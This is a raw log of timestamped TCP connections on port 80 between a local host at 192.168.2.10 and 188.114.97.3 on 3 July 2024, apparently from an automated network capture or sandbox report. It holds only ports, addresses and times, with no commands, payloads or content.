                                                    Jul 3, 2024 16:43:28.187027931 CEST4981880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:28.187830925 CEST4981980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:28.192442894 CEST8049818188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:28.192518950 CEST4981880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:28.193355083 CEST8049819188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:28.193460941 CEST4981980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:28.193630934 CEST4981980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:28.199378967 CEST8049819188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:28.354566097 CEST4981980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:28.355374098 CEST4982080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:28.360228062 CEST8049820188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:28.362443924 CEST4982080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:28.362648010 CEST4982080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:28.367404938 CEST8049820188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:28.402749062 CEST8049819188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:28.493777990 CEST4982180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:28.499258995 CEST8049821188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:28.499540091 CEST4982180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:28.499655008 CEST4982180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:28.504395962 CEST8049821188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:28.571728945 CEST8049819188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:28.571784973 CEST4981980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:28.713335037 CEST4982080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:28.718194962 CEST8049820188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:28.718336105 CEST8049820188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:28.816402912 CEST8049820188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:28.854458094 CEST4982180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:28.859368086 CEST8049821188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:28.869469881 CEST4982080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:28.948498964 CEST8049821188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:28.994466066 CEST4982180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:29.088962078 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:29.093873978 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:29.164091110 CEST8049820188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:29.184120893 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:29.184267998 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:29.189201117 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:29.189264059 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:29.213229895 CEST4982080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:29.314923048 CEST8049821188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:29.369515896 CEST4982180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:29.401619911 CEST8049821188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:29.447676897 CEST4982180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:29.522166014 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:29.537677050 CEST4982080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:29.537755966 CEST4982180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:29.538499117 CEST4982280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:29.543423891 CEST8049822188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:29.543440104 CEST8049820188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:29.543469906 CEST8049821188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:29.543555975 CEST4982080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:29.543565989 CEST4982280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:29.543596983 CEST4982180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:29.543776989 CEST4982280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:29.548593044 CEST8049822188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:29.572614908 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:29.902895927 CEST4982280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:29.907999992 CEST8049822188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:30.262739897 CEST8049822188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:30.264024973 CEST8049822188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:30.264036894 CEST8049822188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:30.264120102 CEST4982280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:30.382946014 CEST4982280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:30.383755922 CEST4982380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:30.388325930 CEST8049822188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:30.388612032 CEST8049823188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:30.392437935 CEST4982280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:30.392477989 CEST4982380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:30.392620087 CEST4982380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:30.397371054 CEST8049823188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:30.526822090 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:30.531790972 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:30.621807098 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:30.621980906 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:30.627051115 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:30.627068043 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:30.744587898 CEST4982380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:30.749557018 CEST8049823188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:30.886224031 CEST8049823188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:30.923676014 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:30.931989908 CEST4982380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:30.978862047 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:31.003087044 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:31.007967949 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:31.086936951 CEST8049823188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:31.097474098 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:31.097604036 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:31.102466106 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:31.135112047 CEST4982380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:31.211349964 CEST4982480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:31.216509104 CEST8049824188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:31.216634989 CEST4982480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:31.218077898 CEST4982480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:31.222923994 CEST8049824188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:31.390216112 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:31.392888069 CEST4978780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:31.393177032 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:31.575375080 CEST4982480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:31.583831072 CEST8049824188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:31.670202971 CEST8049824188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:31.713340044 CEST4982480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:31.878946066 CEST8049824188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:31.931997061 CEST4982480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:32.013571978 CEST4982480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:32.014708996 CEST4982580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:32.019375086 CEST8049824188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:32.019438028 CEST4982480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:32.019674063 CEST8049825188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:32.019750118 CEST4982580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:32.020035028 CEST4982580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:32.024849892 CEST8049825188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:32.369653940 CEST4982580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:32.374690056 CEST8049825188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:32.489301920 CEST8049825188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:32.543742895 CEST4982580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:32.667859077 CEST8049825188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:32.721709967 CEST4982580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:32.852328062 CEST4982580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:32.853308916 CEST4982680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:32.857573986 CEST8049825188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:32.857688904 CEST4982580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:32.858108044 CEST8049826188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:32.858181953 CEST4982680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:32.858467102 CEST4982680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:32.863225937 CEST8049826188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:33.213408947 CEST4982680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:33.218396902 CEST8049826188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:33.313642025 CEST8049826188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:33.369494915 CEST4982680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:33.642043114 CEST8049826188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:33.697644949 CEST4982680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:33.803044081 CEST4982680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:33.803379059 CEST4982780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:33.808432102 CEST8049827188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:33.808500051 CEST8049826188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:33.808557987 CEST4982780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:33.808583975 CEST4982680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:33.808743000 CEST4982780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:33.813534021 CEST8049827188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:34.166680098 CEST4982780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:34.168098927 CEST4982880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:34.168642998 CEST4982780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:34.172631025 CEST8049827188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:34.173683882 CEST8049828188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:34.173782110 CEST4982880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:34.182308912 CEST8049827188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:34.182374001 CEST4982780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:34.198561907 CEST4982880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:34.203546047 CEST8049828188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:34.413301945 CEST4982980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:34.418466091 CEST8049829188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:34.422492981 CEST4982980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:34.422549009 CEST4982980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:34.427742958 CEST8049829188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:34.557533026 CEST4982880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:34.562823057 CEST8049828188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:34.562841892 CEST8049828188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:34.635180950 CEST8049828188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:34.682015896 CEST4982880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:34.741929054 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:34.747035027 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:34.748447895 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:34.748697996 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:34.753612041 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:34.776151896 CEST4982980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:34.781898022 CEST8049829188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:34.873919010 CEST8049829188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:34.916383028 CEST4982980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:34.978106976 CEST8049828188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:35.025775909 CEST4982880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.111377001 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.116425037 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:35.221559048 CEST8049829188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:35.223052025 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:35.275736094 CEST4982980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.275866985 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.353744984 CEST4982880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.356633902 CEST4982980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.357830048 CEST4983180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.359009027 CEST8049828188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:35.359056950 CEST4982880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.361845016 CEST8049829188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:35.361896038 CEST4982980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.362730980 CEST8049831188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:35.362802982 CEST4983180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.362921000 CEST4983180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.367692947 CEST8049831188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:35.641561985 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:35.641581059 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:35.641633987 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.669821024 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.679934025 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:35.713529110 CEST4983180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.718462944 CEST8049831188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:35.773369074 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:35.773624897 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.778450012 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:35.784931898 CEST4983280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.789825916 CEST8049832188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:35.789894104 CEST4983280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.789969921 CEST4983280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:35.794861078 CEST8049832188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:35.836013079 CEST8049831188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:35.885107994 CEST4983180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:36.067106962 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:36.067126036 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:36.067203045 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:36.104398012 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:36.109318972 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:36.136384964 CEST4983280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:36.142117977 CEST8049832188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:36.166126966 CEST8049831188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:36.202522993 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:36.202711105 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:36.207683086 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:36.207748890 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:36.213315010 CEST4983180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:36.248568058 CEST8049832188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:36.290169954 CEST4983380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:36.291626930 CEST4983280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:36.295085907 CEST8049833188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:36.295356035 CEST4983380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:36.295356035 CEST4983380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:36.300206900 CEST8049833188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:36.458760023 CEST8049832188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:36.486654043 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:36.510380983 CEST4983280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:36.541570902 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:36.654476881 CEST4983380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:36.659421921 CEST8049833188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:36.750652075 CEST8049833188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:36.791395903 CEST4983380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:37.085961103 CEST8049833188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:37.135121107 CEST4983380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:37.241735935 CEST4983380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:37.246052027 CEST4983480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:37.246892929 CEST8049833188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:37.246943951 CEST4983380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:37.250832081 CEST8049834188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:37.250911951 CEST4983480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:37.253112078 CEST4983480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:37.257884979 CEST8049834188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:37.510761976 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:37.515656948 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:37.604202986 CEST4983480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:37.608999968 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:37.609117985 CEST8049834188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:37.609241009 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:37.614111900 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:37.614154100 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:37.692255020 CEST8049834188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:37.744503975 CEST4983480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:37.933255911 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:37.978864908 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:38.024578094 CEST8049834188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:38.072614908 CEST4983480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:38.147578955 CEST4983480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:38.148430109 CEST4983580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:38.152919054 CEST8049834188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:38.152972937 CEST4983480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:38.153306961 CEST8049835188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:38.153374910 CEST4983580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:38.153502941 CEST4983580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:38.158298969 CEST8049835188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:38.510221958 CEST4983580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:38.515254021 CEST8049835188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:38.644229889 CEST8049835188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:38.697633982 CEST4983580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:38.948298931 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:38.953299999 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:38.977206945 CEST8049835188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:39.025755882 CEST4983580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:39.047184944 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:39.047343016 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:39.056618929 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:39.059926987 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:39.100864887 CEST4983580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:39.101552010 CEST4983680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:39.106374025 CEST8049835188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:39.106430054 CEST4983580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:39.108524084 CEST8049836188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:39.108591080 CEST4983680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:39.108735085 CEST4983680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:39.114387989 CEST8049836188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:39.381081104 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:39.431994915 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:39.463613033 CEST4983680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:39.468537092 CEST8049836188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:39.571706057 CEST8049836188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:39.619510889 CEST4983680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:39.917397976 CEST8049836188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:39.963243008 CEST4983680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:39.995628119 CEST4983680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:39.996651888 CEST4983780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.000864029 CEST8049836188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.000916004 CEST4983680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.001450062 CEST8049837188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.001499891 CEST4983780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.001620054 CEST4983780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.006494045 CEST8049837188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.036386967 CEST4983180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.039889097 CEST4983780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.043107986 CEST4983880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.047991037 CEST8049838188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.048309088 CEST4983880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.048408985 CEST4983880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.053438902 CEST8049838188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.086604118 CEST8049837188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.363316059 CEST8049837188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.363380909 CEST4983780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.385736942 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.390594006 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.400813103 CEST4983880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.405678034 CEST8049838188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.484080076 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.484278917 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.489165068 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.489234924 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.493532896 CEST8049838188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.541372061 CEST4983880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.699007988 CEST8049838188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.744503975 CEST4983880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.785795927 CEST8049838188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.818722963 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.838248014 CEST4983880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.869502068 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.915795088 CEST4983880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.917382956 CEST4983980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.921000004 CEST8049838188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.921132088 CEST4983880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.922278881 CEST8049839188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.922802925 CEST4983980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:40.928491116 CEST4983980192.168.2.10188.114.97.3
